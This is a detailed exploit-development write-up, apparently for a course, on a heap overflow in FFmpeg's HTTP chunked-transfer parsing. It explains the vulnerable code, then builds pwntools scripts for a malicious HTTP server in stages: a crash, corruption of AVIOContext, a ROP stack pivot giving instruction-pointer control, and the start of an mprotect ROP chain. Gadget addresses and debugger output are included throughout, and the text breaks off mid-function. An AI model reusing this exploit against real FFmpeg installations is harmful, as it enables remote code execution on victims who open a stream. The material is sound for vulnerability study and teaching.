Part 1: The Vulnerability

Background

FFmpeg is a popular free software project that develops libraries and programs for manipulating audio, video, and image data. The command line tool ffmpeg is very widely used by users and commercial entities to transcode multimedia content and the libavformat muxing and demuxing library is used extensively by other software. Popular open source media players such as VLC or mplayer use the library as the main work horse to provide playback of various video and audio formats.

The vulnerability exists in the HTTP parsing functionality of the libavformat library. Hence, the bug may commonly triggered in applications that employ libavformat to parse HTTP streams containing multimedia data. One such application is the ffmpeg application shipped with a standard install of the project.

Vulnerability Classification

Originally discovered by Paul Cher, the vulnerability is a heap-based buffer overflow in the libavformat/http.c file in FFmpeg versions before 2.8.10, 3.0.x before 3.0.5, 3.1.x before 3.1.6, and 3.2.x before 3.2.2. A malicious HTTP server may cause the heap overflow to occur by supplying a negative chunk size in the HTTP response when enabling chunked transfer encoding to achieve arbitrary code execution.

The Overall CVSSv3 Score for the vulnerability is 9.8. This means that the bug is considered to be critical. The impact to the victim includes unauthorised disclosure of information, unauthorised modification of data, and allows for an attacker to disrupt services. The vulnerability is remotely triggered but requires the victim to initiate a connection with the malicious server.

Vulnerability Description

The Heap Overflow

The issue exists in the portion of the code handling HTTP responses from the queried HTTP server. The malicious code path is triggered by enabling chunked transfer encoding so that FFmpeg would process the response stream in chunks. In the file libavformat/http.c, we can find the following lines of code that enable the chunk processing behaviour.

 720 static int process_line(URLContext *h, char *line, int line_count,
 721                         int *new_location)
 722 {

 819         } else if (!av_strcasecmp(tag, "Transfer-Encoding") &&
 820                    !av_strncasecmp(p, "chunked", 7)) {
 821             s->filesize  = -1;
 822             s->chunksize = 0;
 823         }

 855 }

Chunked transfer encoding is a mechanism specified in the HTTP protocol to allow for a transmission of the HTTP stream to be split up. This is used to provide buffering functionality so that images, audio, or video can be displayed or played without waiting for the entire file to be downloaded.

A chunked response example may look like so:

HTTP/1.1 200 OK
Content-Type: text/plain
Transfer-Encoding: chunked

5\r\n
Hello\r\n
6\r\n
World!\r\n
0\r\n
\r\n

The response body is encoded by splitting up the data to be transmitted into chunks and sending the length of the next chunk on a line followed by the chunk itself.

The actual vulnerability exists in the http_read_stream function in the file libavformat/http.c. The following lines are pertinent:

1235 static int http_read_stream(URLContext *h, uint8_t *buf, int size)
1236 {
1237     HTTPContext *s = h->priv_data;

1250     if (s->chunksize >= 0) {
1251         if (!s->chunksize) {
1252             char line[32];
1253
1254                 do {
1255                     if ((err = http_get_line(s, line, sizeof(line))) < 0)
1256                         return err;
1257                 } while (!*line);    /* skip CR LF from last chunk */
1258
1259                 s->chunksize = strtoll(line, NULL, 16);

1264                 if (!s->chunksize)
1265                     return 0;
1266         }
1267         size = FFMIN(size, s->chunksize);

1273     read_ret = http_buf_read(h, buf, size);

1295 }

Before performing the analysis, a little more information on the HTTPContext *s variable. The HTTPContext struct has the field chunksize which is of type int64_t. The important thing to note is that variables of type int64_t which are signed. This means that the field can represent negative integers.

gdb-peda$ ptype HTTPContext
type = struct HTTPContext {
...
    int64_t chunksize;
...
}

In the http_read_stream listing above, the chunk size is first read from the HTTP response into the variable line.

1255                     if ((err = http_get_line(s, line, sizeof(line))) < 0)

The next line of interest is the core of the vulnerability. The strtoll function converts a string to a long long which is equivalent to int64_t. The use of the strtoll function and int64_t data type means that the s->chunksize field can contain negative integers.

1259                 s->chunksize = strtoll(line, NULL, 16);

After the integer is parsed, it is run with the FFMIN macro.

1267         size = FFMIN(size, s->chunksize);

The FFMIN macro is declared in the libavutil/common.h file. The macro is simple and returns the lowest value of the two parameters. The size field contains 0x8000 at the beginning of the function. Hence, when a negative integer is parsed as the chunk size, it is always selected to be the size. For simplicity, we will assume that this chunk size is -1 from this point on.

96 #define FFMIN(a,b) ((a) > (b) ? (b) : (a))

The size is then passed to the function http_buf_read.

1273     read_ret = http_buf_read(h, buf, size);

The function http_buf_read is in libavformat/http.c. The function in turn calls ffurl_read with the size variable.

1166 static int http_buf_read(URLContext *h, uint8_t *buf, int size)
1167 {
1168     HTTPContext *s = h->priv_data;

1182         len = ffurl_read(s->hd, buf, size);

1198 }

The ffurl_read function is found in the libavformat/avio.c file. The retry_transfer_wrapper function is called. This time, the h->prot->url_read pointer is passed to the function.

407 int ffurl_read(URLContext *h, unsigned char *buf, int size)
408 {

411     return retry_transfer_wrapper(h, buf, size, 1, h->prot->url_read);
412 }

The pointer h->prot->url_read is a function pointer to the function tcp_read.

gdb-peda$ print *h.prot
$11 = {
...
  url_read = 0x6c7a90 <tcp_read>,
...
  }

The function retry_transfer_wrapper in libavformat/avio.c calls the function pointer passed in previously. The function that would be called in this case would be the tcp_read function.

364 static inline int retry_transfer_wrapper(URLContext *h, uint8_t *buf,
365                                          int size, int size_min,
366                                          int (*transfer_func)(URLContext *h,
367                                                               uint8_t *buf,
368                                                               int size))
369 {

378         ret = transfer_func(h, buf + len, size - len);

405 }

The tcp_read function in libavformat/tcp.c is the actual point in the code where the data from the socket is read into the buffer. This finally concludes in the actual buffer overflow because of the mismatch between the data type of int size in tcp_read and the data type of size_t len in recv.

201 static int tcp_read(URLContext *h, uint8_t *buf, int size)
202 {
203     TCPContext *s = h->priv_data;

211     ret = recv(s->fd, buf, size, 0);

213 }

From the man pages of recv:

ssize_t recv(int sockfd, void *buf, size_t len, int flags);

Since int is signed and size_t is unsigned, a signed value of -1 will be interpreted as an unsigned value of 0xffffffffffffffff. This will cause recv to read an extraordinarily large amount of data into the 0x8000 length buffer.

Since the buffer is on allocated on the heap, this results in a heap-based buffer overflow. See the section on Exploit Development for confirmation of this memory error condition.

Heap Layout

At the point of the overflow, the buffer is allocated right before an AVIOContext object. In the original exploit proof-of-concept by Paul Cher, he discovers that the AVIOContext object is allocated at an offset of 0x8060 from the buffer.

gdb-peda$ ptype AVIOContext
type = struct AVIOContext {
    const AVClass *av_class;
    unsigned char *buffer;
    int buffer_size;
    unsigned char *buf_ptr;
    unsigned char *buf_end;
    void *opaque;
    int (*read_packet)(void *, uint8_t *, int);
    int (*write_packet)(void *, uint8_t *, int);
    int64_t (*seek)(void *, int64_t, int);
    int64_t pos;
    int must_flush;
    int eof_reached;
    int write_flag;
    int max_packet_size;
    unsigned long checksum;
    unsigned char *checksum_ptr;
    ...
    }

Since we can corrupt the AVIOContext object, we can control the value of the fields. A particularly interesting field to control is the read_packet field which is used in the avio_read function. The function is called later in the program and will be the way an attacker can achieve remote code execution.

The avio_read function can be found in the libavformat/aviobuf.c file.

 604 int avio_read(AVIOContext *s, unsigned char *buf, int size)
 605 {

 614                 if(s->read_packet)
 615                     len = s->read_packet(s->opaque, buf, size);

 651 }

For completeness, the eof_reached field has to be addressed. During execution, if the field is not zero, the socket read is halted and will prevent the remote code execution control flow from executing.

Part 2: Demonstration

The Environment

1. Install Ubuntu 16.04 x64

In this demo, Ubuntu 16.04 x64 is used with vagrant.

$ vagrant init ubuntu/xenial64
$ vagrant up

2. Install Python and Pwntools

The exploit will be written in python using the pwntools framework. Pwntools is a framework for exploit development and enables rapid prototyping as well as debugging. Additionally, ropper, a tool to search for ROP gadgets within a given binary is installed.

$ sudo apt-get update
$ sudo apt-get upgrade
$ sudo apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev
build-essential
$ sudo pip install --upgrade pip
$ sudo pip install --upgrade pwntools
$ sudo pip install --upgrade ropper

Building FFmpeg 3.2.1

First, we need to update the system and install the dependencies.

sudo apt-get update
sudo apt-get -y install autoconf automake build-essential libass-dev \
    libfreetype6-dev libsdl2-dev libtheora-dev libtool libva-dev libvdpau-dev \
    libvorbis-dev libxcb1-dev libxcb-shm0-dev libxcb-xfixes0-dev pkg-config \
    texinfo wget zlib1g-dev yasm

Next, we download the FFmpeg 3.2.1 release sources and build it according to the instructions given in https://trac.ffmpeg.org/wiki/CompilationGuide/Ubuntu.

$ wget https://github.com/FFmpeg/FFmpeg/archive/n3.2.1.tar.gz
$ tar xvfz n3.2.1.tar.gz
$ mkdir ~/ffmpeg_build
$ mkdir ~/ffmpeg_bin
$ cd FFmpeg-n3.2.1/
$ ./configure --prefix="$HOME/ffmpeg_build" --bindir="$HOME/ffmpeg_bin" \
  --disable-stripping
$ make -j 4
$ make install

The binaries will be placed in the ~/ffmpeg_bin/ directory. The ffmpeg binary is the one that we will be working with in this demo.

$ ~/ffmpeg_bin/ffmpeg
ffmpeg version 3.2.1 Copyright (c) 2000-2016 the FFmpeg developers
  built with gcc 5.4.0 (Ubuntu 5.4.0-6ubuntu1~16.04.4) 20160609
  configuration: --prefix=/home/ubuntu/ffmpeg_build
                 --bindir=/home/ubuntu/ffmpeg_bin --disable-stripping
  libavutil      55. 34.100 / 55. 34.100
  libavcodec     57. 64.101 / 57. 64.101
  libavformat    57. 56.100 / 57. 56.100
  libavdevice    57.  1.100 / 57.  1.100
  libavfilter     6. 65.100 /  6. 65.100
  libswscale      4.  2.100 /  4.  2.100
  libswresample   2.  3.100 /  2.  3.100
Hyper fast Audio and Video encoder
usage: ffmpeg [options] [[infile options] -i infile]... {[outfile options]
       outfile}...

Use -h to get full help or, even better, run 'man ffmpeg'

Notice that the binary has the following protections enabled:

$ checksec ffmpeg_debug
[*] '/vagrant/assignments/assignment1/ffmpeg_debug'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    FORTIFY:  Enabled

Furthermore, it is also assumed that ASLR will be enabled and that the exploit will have to bypass this mitigation.

Baseline Behaviour

In the expected use case, ffmpeg is used to convert a video stream served over HTTP into an AVI file. In this demonstration of baseline behaviour, we use a sample video from ‘sample-videos.com’ as an example stream.

The invocation and result looks like so:

$ ./ffmpeg -i \
http://www.sample-videos.com/video/mp4/720/big_buck_bunny_720p_1mb.mp4 \
/tmp/test.avi
ffmpeg version 3.2.1 Copyright (c) 2000-2016 the FFmpeg developers
  built with gcc 5.4.0 (Ubuntu 5.4.0-6ubuntu1~16.04.4) 20160609
  configuration: --prefix=/home/ubuntu/ffmpeg_build
                 --bindir=/home/ubuntu/ffmpeg_bin --disable-stripping
  libavutil      55. 34.100 / 55. 34.100
  libavcodec     57. 64.101 / 57. 64.101
  libavformat    57. 56.100 / 57. 56.100
  libavdevice    57.  1.100 / 57.  1.100
  libavfilter     6. 65.100 /  6. 65.100
  libswscale      4.  2.100 /  4.  2.100
  libswresample   2.  3.100 /  2.  3.100
Input #0, mov,mp4,m4a,3gp,3g2,mj2, from
  'http://www.sample-videos.com/video/mp4/720/big_buck_bunny_720p_1mb.mp4':
  Metadata:
    major_brand     : isom
    minor_version   : 512
    compatible_brands: isomiso2avc1mp41
    creation_time   : 1970-01-01T00:00:00.000000Z
    encoder         : Lavf53.24.2
  Duration: 00:00:05.31, start: 0.000000, bitrate: 1589 kb/s
    Stream #0:0(und): Video: h264 (Main) (avc1 / 0x31637661), yuv420p, 1280x720
    [SAR 1:1 DAR 16:9], 1205 kb/s, 25 fps, 25 tbr, 12800 tbn, 50 tbc (default)
    Metadata:
      creation_time   : 1970-01-01T00:00:00.000000Z
      handler_name    : VideoHandler
    Stream #0:1(und): Audio: aac (LC) (mp4a / 0x6134706D), 48000 Hz, 5.1, fltp,
      384 kb/s (default)
    Metadata:
      creation_time   : 1970-01-01T00:00:00.000000Z
      handler_name    : SoundHandler
Output #0, avi, to '/tmp/test.avi':
  Metadata:
    major_brand     : isom
    minor_version   : 512
    compatible_brands: isomiso2avc1mp41
    ISFT            : Lavf57.56.100
    Stream #0:0(und): Video: mpeg4 (FMP4 / 0x34504D46), yuv420p, 1280x720
    [SAR 1:1 DAR 16:9], q=2-31, 200 kb/s, 25 fps, 25 tbn, 25 tbc (default)
    Metadata:
      creation_time   : 1970-01-01T00:00:00.000000Z
      handler_name    : VideoHandler
      encoder         : Lavc57.64.101 mpeg4
    Side data:
      cpb: bitrate max/min/avg: 0/0/200000 buffer size: 0 vbv_delay: -1
    Stream #0:1(und): Audio: ac3 ([0] [0][0] / 0x2000), 48000 Hz, 5.1, fltp,
    448 kb/s (default)
    Metadata:
      creation_time   : 1970-01-01T00:00:00.000000Z
      handler_name    : SoundHandler
      encoder         : Lavc57.64.101 ac3
Stream mapping:
  Stream #0:0 -> #0:0 (h264 (native) -> mpeg4 (native))
  Stream #0:1 -> #0:1 (aac (native) -> ac3 (native))
Press [q] to stop, [?] for help
frame=  132 fps= 36 q=31.0 Lsize=
903kB time=00:00:05.31 bitrate=1393.3kbits/s speed=1.47x
video:596kB audio:290kB subtitle:0kB other streams:0kB global headers:0kB muxing
overhead: 1.899860%

Developing the Exploit

Basic Crash Implementation

To begin with, we can start with a basic skeleton of a python script that is sufficient to cause a crash in ffmpeg.

#!/usr/bin/python

from pwn import *
import time
import socket

# HTTP Headers

headers = """HTTP/1.1 200 OK
Server: PwnServ/v1.0
Date: Sun, 11 Mar 1994 13:37:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked

"""

def main():
    # Start a listener and wait for a connection from ffmpeg
    p = listen(12345)

    p.wait_for_connection()
    log.success("Victim found!")

    # Initialise the ffmpeg instance and prepare it for the bug
    p.send(headers)

    # Trigger the bug with the overly large read
    p.sendline("-1")
    log.info("Bug triggered. Please wait for two seconds...")
    time.sleep(2)   # The sleep allows for a clean transmission boundary

    payload  = "A" * 0x8060

    # Send the entire payload
    log.info("Payload sent!")
    p.send(payload)

    # Close the socket to terminate the read on the ffmpeg end to process the
    # overwrite
    p.close()

if __name__ == '__main__':
    main()

Running the python script and starting the listener.

$ python crash.py
[+] Trying to bind to 0.0.0.0 on port 12345: Done
[+] Waiting for connections on 0.0.0.0:12345: Got connection from 127.0.0.1 on port 59258
[+] Victim found!
[*] Bug triggered. Please wait for two seconds...
[*] Payload sent!
[*] Closed connection to 127.0.0.1 port 59258

Starting the ffmpeg binary ends in the binary yielding the abort signal and display an invalid free debug message which indicates some corruption of the heap.

$ ./ffmpeg -i http://127.0.0.1:12345 test.avi
ffmpeg version 3.2.1 Copyright (c) 2000-2016 the FFmpeg developers
  built with gcc 5.4.0 (Ubuntu 5.4.0-6ubuntu1~16.04.4) 20160609
  configuration: --prefix=/home/ubuntu/ffmpeg_build
  --bindir=/home/ubuntu/ffmpeg_bin --disable-stripping
  libavutil      55. 34.100 / 55. 34.100
  libavcodec     57. 64.101 / 57. 64.101
  libavformat    57. 56.100 / 57. 56.100
  libavdevice    57.  1.100 / 57.  1.100
  libavfilter     6. 65.100 /  6. 65.100
  libswscale      4.  2.100 /  4.  2.100
  libswresample   2.  3.100 /  2.  3.100
*** Error in `./ffmpeg': free(): invalid next size (normal): 0x0000000002042b80 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7f01f9f047e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f01f9f0d37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f01f9f1153c]
./ffmpeg[0x5ca7b5]
./ffmpeg[0x5edb26]
./ffmpeg[0x6db95d]
./ffmpeg[0x4880b0]
./ffmpeg[0x489cec]
./ffmpeg(main+0xa2)[0x47bdf2]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f01f9ead830]
./ffmpeg[0x47c039]
======= Memory map: ========
00400000-01446000 r-xp 00000000 08:01 784064 /home/ubuntu/ffmpeg_bin/ffmpeg
01645000-01646000 r--p 01045000 08:01 784064 /home/ubuntu/ffmpeg_bin/ffmpeg
01646000-0168d000 rw-p 01046000 08:01 784064 /home/ubuntu/ffmpeg_bin/ffmpeg
0168d000-01de4000 rw-p 00000000 00:00 0
02040000-0207b000 rw-p 00000000 00:00 0      [heap]
...
7ffe943ad000-7ffe943af000 r--p 00000000 00:00 0                          [vvar]
7ffe943af000-7ffe943b1000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0              [vsyscall]
Aborted (core dumped)

AVIOContext Object Corruption

To corrupt the AVIOContext object, we can write a few more bytes.

#!/usr/bin/python

from pwn import *
import time
import socket

# HTTP Headers

headers = """HTTP/1.1 200 OK
Server: PwnServ/v1.0
Date: Sun, 11 Mar 1994 13:37:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked

"""

def main():
    # Start a listener and wait for a connection from ffmpeg
    p = listen(12345)

    p.wait_for_connection()
    log.success("Victim found!")

    # Initialise the ffmpeg instance and prepare it for the bug
    p.send(headers)

    # Trigger the bug with the overly large read
    p.sendline("-1")
    log.info("Bug triggered. Please wait for two seconds...")
    time.sleep(2)   # The sleep allows for a clean transmission boundary

    payload  = "A" * 0x8060

    # Send the entire payload
    log.info("Payload sent!")
    p.send(payload)

    # Close the socket to terminate the read on the ffmpeg end to process the
    # overwrite
    p.close()

if __name__ == '__main__':
    main()

To verify that the bug does indeed exist, we can debug the program. To begin, we break on the recv call in the tcp_read function.

gdb-peda$ c
Continuing.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0xffffffff
RCX: 0x0
RDX: 0xffffffffffffffff
RSI: 0x1de6b80 --> 0x0
RDI: 0x3
RBP: 0x1de6900 --> 0x10a9080 --> 0x10b7c68 --> 0x706374 (<ff_id3v1_read+1028>)
RSP: 0x7fffffffda80 --> 0x1de67c0 --> 0x10725e0 --> 0x106fc8a ("URLContext")
RIP: 0x6c7aae (<tcp_read+30>:    call   0x406220 <[email protected]>)
R8 : 0x0
R9 : 0x1
R10: 0x0
R11: 0x246
R12: 0x1de6b80 --> 0x0
R13: 0x6c7a90 (<tcp_read>:    push   r12)
R14: 0x5
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x6c7aa6 <tcp_read+22>:    xor    ecx,ecx
   0x6c7aa8 <tcp_read+24>:    movsxd rdx,ebx
   0x6c7aab <tcp_read+27>:    mov    rsi,r12
=> 0x6c7aae <tcp_read+30>:    call   0x406220 <[email protected]>
   0x6c7ab3 <tcp_read+35>:    test   eax,eax
   0x6c7ab5 <tcp_read+37>:    jns    0x6c7ac0 <tcp_read+48>
   0x6c7ab7 <tcp_read+39>:    call   0x405fc0 <[email protected]>
   0x6c7abc <tcp_read+44>:    mov    eax,DWORD PTR [rax]
Guessed arguments:
arg[0]: 0x3
arg[1]: 0x1de6b80 --> 0x0
arg[2]: 0xffffffffffffffff
arg[3]: 0x0
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffda80 --> 0x1de67c0 --> 0x10725e0 --> 0x106fc8a ("URLContext")
0008| 0x7fffffffda88 --> 0x1de6b80 --> 0x0
0016| 0x7fffffffda90 --> 0xffffffff
0024| 0x7fffffffda98 --> 0x5c20c4 (<ffurl_read+116>:    cmp    eax,0xfffffffc)
0032| 0x7fffffffdaa0 --> 0x0
0040| 0x7fffffffdaa8 --> 0x1de4cd0 ("HTTP/1.1 200 OK\nServer: PwnServ/v1.0...")
0048| 0x7fffffffdab0 --> 0x1de4cc0 --> 0x10b5020 --> 0x107bff4 --> ('http')
0056| 0x7fffffffdab8 --> 0x1de4b20 --> 0x10725e0 --> 0x106fc8a ("URLContext")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x00000000006c7aae in recv (__flags=0x0, __n=0xffffffffffffffff,
                                          __buf=0x1de6b80, __fd=0x3)
    at /usr/include/x86_64-linux-gnu/bits/socket2.h:44
44      return __recv_alias (__fd, __buf, __n, __flags);
gdb-peda$

We can observe the AVIOContext object to be corrupted just before it gets written into by using the printing functions of gdb.

gdb-peda$ p *(AVIOContext*)(0x1de6b80+0x8060)
$2 = {
  av_class = 0x1072860 <ff_avio_class>,
  buffer = 0x1de6b80 "",
  buffer_size = 0x8000,
  buf_ptr = 0x1de6b80 "",
  buf_end = 0x1de6b80 "",
  opaque = 0x1de69c0,
  read_packet = 0x5c4050 <io_read_packet>,
  write_packet = 0x5c4040 <io_write_packet>,
  seek = 0x5c4030 <io_seek>,
  pos = 0x0,
  must_flush = 0x0,
  eof_reached = 0x0,
  ...
}
gdb-peda$

After the overflow, we can observe that AVIOContext object has been corrupted.

gdb-peda$ p *(AVIOContext*)(0x1de6b80+0x8060)
$12 = {
  av_class = 0x4141414141414141,
  buffer = 0x4141414141414141,
  buffer_size = 0x41414141,
  buf_ptr = 0x4141414141414141,
  buf_end = 0x1de6b80 'A' <repeats 200 times>...,
  opaque = 0x1de69c0,
  read_packet = 0x5c4050 <io_read_packet>,
  write_packet = 0x5c4040 <io_write_packet>,
  seek = 0x5c4030 <io_seek>,
  pos = 0x0,
  must_flush = 0x0,
  eof_reached = 0x0,
  ...
}

The goal is to overwrite the read_packet which gives the RIP control.

Searching for ROP Gadgets

Before we begin writing the payload, we need some Return Oriented Programming (ROP) gadgets. We can find these gadgets by using ropper. ropper is a tool to automate ROP gadget search. In certain conditions, it can even be used to generate full ROP chains to meet certain objectives such as execve or mprotect chains.

Often, we are required to find gadgets that pop values from the stack into particular registers. We can search for them like so:

$ ropper --file ffmpeg_debug --search "pop rsi"
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: pop rsi

[INFO] File: ffmpeg_debug
...
0x00000000005eb942: pop rdx; lahf; std; jmp qword ptr [rsi + 0x2e];
0x00000000009b7efc: pop rdx; leave; ucomisd xmm8, xmm9; seta al; neg eax; ret;
0x0000000000408859: pop rdx; ret;
0x00000000012244c4: pop rdx; salc; ret 0x7840;
0x000000000126a1c4: pop rdx; stc; stosd dword ptr [rdi], eax; cld; ret 0x2afe;
...

Another particularly useful gadget is the write-what-where gadget. These gadgets provide a primitive to place arbitrary memory in arbitrary locations. This is useful to write shellcode to a selected location.

$ ropper --file ffmpeg_debug --search "mov [%], r%x" --quality 1
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: mov [%], r%x

[INFO] File: ffmpeg_debug
...
0x00000000007f452a: mov qword ptr [rsi + 0x38], rax; ret;
0x0000000000b9e69d: mov qword ptr [rsi + 8], rax; ret;
0x00000000007f4392: mov qword ptr [rsi + 8], rdx; ret;
0x0000000000422544: mov qword ptr [rsi], rdx; ret;
0x0000000000f41ec9: mov qword ptr [rsp + 0x10], r8; call rax;
0x0000000000abfb21: mov qword ptr [rsp + 0x10], rax; call rdx;
0x0000000000da8904: mov qword ptr [rsp + 0x10], rcx; call qword ptr [rcx];
...

Getting RIP Control

To get a ROP chain to work, we need to perform a little manipulation of the payload. The complete python script to achieve this is as follows:

#!/usr/bin/python

from pwn import *
import time
import socket

# HTTP Headers

headers = """HTTP/1.1 200 OK
Server: PwnServ/v1.0
Date: Sun, 11 Mar 1994 13:37:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked

"""

# ROP Gadgets

pop_rsp = 0x00000000004077e9     # pop rsp; ret;
stack_pivot = 0x000000000049daa9 # add rsp, 0x58; ret;
push_rbx_jmp_rdi = 0x000000000117fc75 # push rbx; jmp rdi;


def main():
    # Start a listener and wait for a connection from ffmpeg
    p = listen(12345)

    # Wait for connection before sending payload
    log.info("Waiting for the victim...")
    p.wait_for_connection()
    log.success("Victim found!")

    # Initialise the ffmpeg instance and prepare it for the bug
    p.send(headers)

    # Trigger the bug with the overly large read
    p.sendline("-1")
    log.info("Bug triggered. Please wait for two seconds...")
    time.sleep(2)   # The sleep allows for a clean transmission boundary

    payload  = "A" * 0x8060     # Padding to start of AVIOContext struct

    # Setup the fake AVIOContext struct for the pivot into attacker controlled
    # memory

    payload += p64(stack_pivot) # [av_class] Pivot stack into controlled mem (3)
    payload += ("A"*8) * 4      # [buffer, buffer_size, buf_ptr, buf_end]
    payload += p64(pop_rsp)     # [opaque] Value in RDI at (1). (2)

    payload += p64(push_rbx_jmp_rdi) # [read_packet] initial RIP control (1)

    payload += ("X"*8) * 3      # [write_packet, seek, pos]
    payload += "AAAA"           # [must_flush]
    payload += p32(0)           # [eof_reached] Must be zero or read terminates
    payload += "A" * 8          # [write_flag, max_packet_size]
    payload += p64(stack_pivot) # [checksum] One more stack pivot (4)
    payload += ("A"*8) * 11     # Padding to set up the stack for the main ROP

    # ROP chain starts here
    payload += p64(0xdeadbeef)  # ROP Chain
    payload += p64(0xcafebabe)
    payload += p64(0xba5eba11)

    # Send the entire payload
    log.info("Payload sent!")
    p.send(payload)

    # Close the socket to terminate the read on the ffmpeg end to process the
    # shellcode
    p.close()


if __name__ == '__main__':
    main()

The interesting part of the entire payload is the portion before the actual ROP chain. It sets up the AVIOContext object very carefully and utilises four different ROP gadgets to pivot the stack into the controllable region of heap memory.

Before walking through the execution flow, the eof_reached field must be set to 0. This happens in this line:

    payload += p32(0)           # [eof_reached] Must be zero or read terminates

The initial RIP control happens on this line:

    payload += p64(push_rbx_jmp_rdi) # [read_packet] initial RIP control (1)

Next, since the address of pop_rsp was stored in RDI, the control flow will continue onto the following line:

   payload += p64(pop_rsp)     # [opaque] Value in RDI at (1). (2)

This moves the stack and executes the following line:

    payload += p64(stack_pivot) # [av_class] Pivot stack into controlled mem (3)

Finally, another stack pivot is executed to move the stack back up into an uncorrupted region of memory:

    payload += p64(stack_pivot) # [checksum] One more stack pivot (4)

From that point onward, we can include a standard ROP chain:

    payload += p64(0xdeadbeef)  # ROP Chain
    payload += p64(0xcafebabe)
    payload += p64(0xba5eba11)

To test this, we can break on the line in the avio_read function in libavformat/aviobuf.c:

 615                     len = s->read_packet(s->opaque, buf, size);

Which corresponds roughly to the following line in assembly:

   0x00000000005c79ab <+331>:    mov    r14d,r15d
   0x00000000005c79ae <+334>:    mov    rdi,QWORD PTR [rbx+0x28]
   0x00000000005c79b2 <+338>:    mov    edx,r14d
   0x00000000005c79b5 <+341>:    mov    rsi,rbp
   0x00000000005c79b8 <+344>:    call   rax

The important instruction is the call rax instruction. RAX would contain the value of s->read_packet and the instruction would cause the execution flow to jump to that value.

Allowing the binary to run until it crashes would show that the ROP chain works.

gdb-peda$ c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x117fc75 --> 0xbfdd7fee7fff3ff
RBX: 0x1deebe0 --> 0x49daa9 (<term_init+105>:    add    rsp,0x58)
RCX: 0x4141414141414141 ('AAAAAAAA')
RDX: 0x80a395ca
RSI: 0x1deecb8 --> 0x300000000
RDI: 0x4077e9 (<audio_read_header+272>:    pop    rsp)
RBP: 0x1deecb8 --> 0x300000000
RSP: 0x1deeca8 --> 0xcafebabe
RIP: 0xdeadbeef
R8 : 0x0
R9 : 0x41414141 ('AAAA')
R10: 0x41414141 ('AAAA')
R11: 0x246
R12: 0x800
R13: 0x800
R14: 0x80a395ca
R15: 0x41414141 ('AAAA')
EFLAGS: 0x10216 (carry PARITY ADJUST zero sign trap INTERRUPT direction)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0xdeadbeef
[------------------------------------stack-------------------------------------]
0000| 0x1deeca8 --> 0xcafebabe
0008| 0x1deecb0 --> 0xba5eba11
0016| 0x1deecb8 --> 0x300000000
0024| 0x1deecc0 --> 0x8000000000000000
0032| 0x1deecc8 --> 0x831
0040| 0x1deecd0 --> 0x1de69d0 --> 0x20 (' ')
0048| 0x1deecd8 --> 0x0
0056| 0x1deece0 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00000000deadbeef in ?? ()
gdb-peda$ bt
#0  0x00000000deadbeef in ?? ()
#1  0x00000000cafebabe in ?? ()
#2  0x00000000ba5eba11 in ?? ()
#3  0x0000000300000000 in ?? ()
#4  0x8000000000000000 in ?? ()
#5  0x0000000000000831 in ?? ()
#6  0x0000000001de69d0 in ?? ()
#7  0x0000000000000000 in ?? ()
gdb-peda$

The segfault shows that the program crashed on 0xdeadbeef and that the future return addresses are within our control.

mprotect ROP Chain

The next step is to write the ROP chain to perform an mprotect call to mark a region of memory as readable, writable, and executable. Then, the ROP chain would copy shellcode into this region of memory before jumping to it. First, we need to find the address of mprotect in the Procedure Linkage Table.

$ objdump -d ffmpeg | grep mprotect
00000000004071f0 <[email protected]>:
  4749b3:    e8 38 28 f9 ff           callq  4071f0 <[email protected]>
  4749d3:    e8 18 28 f9 ff           callq  4071f0 <[email protected]>

From the above we can get the address 0x00000000004071f0 as the address of mprotect. Additionally, we will need an address to pick as the place where we will put the shellcode. The writable section (0x01646000) of the binary is a good pick:

gdb-peda$ vmmap
Start              End              Perm    Name
0x00400000         0x01446000       r-xp    /home/ubuntu/debug/ffmpeg_bin/ffmpeg
0x01645000         0x01646000       r--p    /home/ubuntu/debug/ffmpeg_bin/ffmpeg
0x01646000         0x0168d000       rw-p    /home/ubuntu/debug/ffmpeg_bin/ffmpeg
0x0168d000         0x01e05000       rw-p    [heap]
...

Next, we can take a look at mmap.c in the Linux source code to figure out the values of PROT_READ, PROT_WRITE, and PROT_EXEC for the call to mprotect.

#define PROT_READ    0x1     /* Page can be read.  */
#define PROT_WRITE    0x2     /* Page can be written.  */
#define PROT_EXEC    0x4     /* Page can be executed.  */

The python code to perform the mprotect and copy shellcode is as follows:

# ROP Gadgets

pop_rsp = 0x00000000004077e9     # pop rsp; ret;
stack_pivot = 0x000000000049daa9 # add rsp, 0x58; ret;
push_rbx_jmp_rdi = 0x000000000117fc75 # push rbx; jmp rdi;

mprotect_segment = 0x01646000
mprotect_size = 0x500
mprotect_prot = 0x1 | 02 | 0x4

pop_rdi = 0x0000000000407c39
pop_rsi = 0x0000000000408b2c
pop_rdx = 0x0000000000408859

write_gadget = 0x0000000000422544 # mov qword ptr [rsi], rdx; ret;

mprotect_plt = 0x4071f0


def generate_mov(address_base, data):
    """Move data into memory startng at the given address_base with a write
    gadget."""

    def chunks(l, n):
        """Yield successive n-sized chunks from l."""
        for i in range(0, len(l), n):
            yield l[i:i + n]

    ropchain = ""
